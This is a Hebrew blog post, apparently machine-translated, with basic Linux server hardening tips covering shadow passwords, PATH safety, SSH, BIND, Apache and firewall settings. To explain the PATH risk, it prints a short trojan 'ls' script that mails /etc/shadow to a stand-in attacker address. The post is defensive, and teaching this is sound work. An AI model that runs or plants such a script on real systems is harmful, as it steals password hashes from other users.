טיפים לאבטחה עבור Linux (שרת) שלך (חלק 1)

@Jlcmux

5 דקות

הרבה זמן לא פרסמתי שום דבר בבלוג והייתי רוצה לחלוק כמה טיפים הלקוחים מתוך ספר, (בין היתר). מצאתי את זה באוניברסיטה ופשוט קראתי ולמרות שזה באמת מיושן והטכניקות המוצגות מאוד אינן יכולות לעבוד בהתחשב בהתפתחות המערכת, אך הם גם היבטים מעניינים שניתן להראות. 9788448140502

אני רוצה להבהיר שהם מכוונים למערכת לינוקס המשמשת כשרת, בקנה מידה בינוני או אולי גדול, שכן ברמת המשתמש בשולחן העבודה, למרות שהם ניתנים ליישום, הם לא יהיו שימושיים במיוחד.

אני גם מזהיר שהם טיפים פשוטים מהירים ולא אפרט הרבה, אם כי אני מתכנן לעשות עוד פוסט הרבה יותר ספציפי ונרחב בנושא מסוים. אבל אני אראה את זה אחר כך. בוא נתחיל.

מדיניות סיסמאות. 

למרות שזה נשמע כמו ביטוי לוכד, קיום מדיניות סיסמאות טובה עושה את ההבדל בין מערכת פגיעה או לא. התקפות כמו "כוח אכזרי" מנצלות את היותה עם סיסמא גרועה כדי לגשת למערכת. הטיפים הנפוצים ביותר הם:

  • שלב אותיות רישיות וקטנות.
  • השתמש בתווים מיוחדים.
  • מספרים.
  • יותר מ 6 ספרות (אני מקווה שיותר מ 8).

בנוסף לכך, נבחן שני קבצים חיוניים.  / etc / passwd ו / etc / shadow.

משהו חשוב מאוד הוא שהקובץ / etc / passwd. בנוסף לתת לנו את שם המשתמש, ה- UID שלו, נתיב התיקיה, הבאש .. וכו '. בחלק מהמקרים הוא מציג גם את המפתח המוצפן של המשתמש.

 בואו נסתכל על הרכבו האופייני.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

משתמש: cryptkey: uid: gid: path :: path: bash

הבעיה האמיתית כאן היא שלקובץ המסוים הזה יש הרשאות -rw-r - r– כלומר יש לו הרשאות קריאה לכל משתמש במערכת. ולא חשוב מאוד לפענח את המפתח המוצפן.

לכן הקובץ קיים / וכו '/ צל. זהו הקובץ בו מאוחסנים בין היתר כל מפתחות המשתמש. לקובץ זה יש את ההרשאות הדרושות כך שאף משתמש לא יוכל לקרוא אותו.

כדי לתקן זאת לאחר מכן, עלינו לעבור לקובץ / etc / passwd ושנה את המפתח המוצפן ל- "x", זה יגרום למפתח לשמור רק בקובץ שלנו / וכו '/ צל.

desdelinux:x:500:501::/home/usuario1:/bin/bash

בעיות עם ה- PATH ו- .bashrc ואחרים.

כאשר משתמש מבצע פקודה במסוף שלהם, הקליפה מחפשת את הפקודה ברשימת ספריות הכלולות במשתנה הסביבה PATH.

אם תקליד "echo $ PATH" במסוף זה יפיק משהו כזה.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

כל אחת מהתיקיות הללו היא המקום בו הקליפה תחפש את הפקודה שנכתבה לביצועה. הוא "." פירוש הדבר שהתיקיה הראשונה לחיפוש היא אותה תיקיה ממנה מתבצעת הפקודה.

נניח שיש משתמש "קרלוס" והמשתמש הזה רוצה "לעשות רע". משתמש זה יכול להשאיר קובץ בשם "ls" בתיקיה הראשית שלו, ובקובץ זה לבצע פקודה כמו:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

ואם משתמש הבסיס לדברים של היעד ינסה לרשום את התיקיות בתוך תיקיית carlos (כפי שהוא מחפש לראשונה את הפקודה באותה תיקיה, מבלי משים הוא ישלח את הקובץ עם הסיסמאות לדוא"ל זה ואז התיקיות היו רשומות והוא לא יגלה זאת עד מאוחר מאוד.

כדי להימנע מכך עלינו לחסל את ה". " של המשתנה PATH.

באותו אופן, יש לבצע ביקורת על קבצים כמו /.bashrc, /.bashrc_profile, ./.login ולבדוק שאין "." במשתנה PATH, ולמעשה מקבצים כמו זה, אתה יכול לשנות את היעד של פקודה ספציפית.

טיפים עם שירותים:

ש.ח.

  • השבת גרסה 1 של פרוטוקול ssh בקובץ sshd_config.
  • אל תאפשר למשתמש הבסיס להיכנס באמצעות ssh.
  • את הקבצים והתיקיות ssh_host_key, ssh_host_dsa_key ו- ssh_host_rsa_key יש לקרוא רק על ידי משתמש השורש.

BIND

  • שנה את הודעת הפתיחה בקובץ named.conf כך שהיא לא תציג את מספר הגרסה
  • הגבל את העברות האזור, והפעל אותו רק עבור קבוצות הזקוקות לכך.

אַפָּשׁ

  • מנע מהשירות להציג את גרסתך בהודעת קבלת הפנים. ערוך את הקובץ httpd.conf והוסף או שנה את השורות:  

ServerSignature Off
ServerTokens Prod

  • השבת אינדקס אוטומטי
  • הגדר את אפאצ'י כך שלא יגיש קבצים רגישים כמו .htacces, * .inc, * .jsp .. וכו '
  • הסר דפי איש או דוגמה מהשירות
  • הפעל אפאצ'י בסביבה שורשית

אבטחת רשת.

חיוני לכסות את כל הערכים האפשריים למערכת שלך מהרשת החיצונית, להלן מספר טיפים חיוניים למניעת סריקה של פולשים וקבלת מידע מהרשת שלך.

חסום תעבורת ICMP

יש להגדיר את חומת האש כך שתחסום את כל סוגי התעבורה והתגובות ICMP נכנסות ויוצאות. בכך אתה נמנע מכך, למשל, סורק המחפש ציוד חי בטווח של IP יאתר אותך. 

הימנע מסריקת פינג TCP.

אחת הדרכים לסרוק את המערכת שלך היא סריקת פינג TCP. נניח שבשרת שלך יש שרת אפאצ'י ביציאה 80. הפורץ יכול לשלוח בקשת ACK ליציאה ההיא, עם זאת, אם המערכת תגיב, המחשב יהיה חי ויסרוק את שאר היציאות.

לשם כך, על חומת האש שלך תמיד להיות האפשרות "מודעות למצב" ועליה להשליך את כל מנות ה- ACK שאינן תואמות חיבור TCP או הפעלה שכבר הוקמה.

כמה טיפים נוספים:

  • השתמש במערכות IDS כדי לזהות סריקות יציאה לרשת שלך.
  • הגדר את חומת האש כך שלא תסמוך על הגדרות יציאת מקור החיבור.

הסיבה לכך היא שחלק מהסריקות משתמשות ביציאת מקור "מזויפת" כמו 20 או 53, מכיוון שמערכות רבות סומכות על יציאות אלה מכיוון שהן אופייניות ל- ftp או ל- DNS.

הערה: זכור שרוב הבעיות שצוינו בפוסט זה כבר נפתרו כמעט בכל ההפצות הנוכחיות. אבל זה אף פעם לא כואב שיש מידע מרכזי על הבעיות האלה כדי שלא יקרו לך.

הערה: בהמשך אראה נושא ספציפי ואערוך פוסט עם מידע הרבה יותר מפורט ועדכני.

תאקס את כולם לקריאה.

ברכות.


השאירו את התגובה שלכם

כתובת הדוא"ל שלך לא תפורסם. שדות חובה מסומנים *

*

*

  1. אחראי לנתונים: מיגל אנחל גטון
  2. מטרת הנתונים: בקרת ספאם, ניהול תגובות.
  3. לגיטימציה: הסכמתך
  4. מסירת הנתונים: הנתונים לא יועברו לצדדים שלישיים אלא בהתחייבות חוקית.
  5. אחסון נתונים: מסד נתונים המתארח על ידי Occentus Networks (EU)
  6. זכויות: בכל עת תוכל להגביל, לשחזר ולמחוק את המידע שלך.

  1.   מַחשֵׁב דיג'ו
    hace 8 שנים

    מאוד אהבתי את המאמר ואני מתעניין בנושא, אני ממליץ לך להמשיך ולהעלות תכנים.

    השב ל- Informatico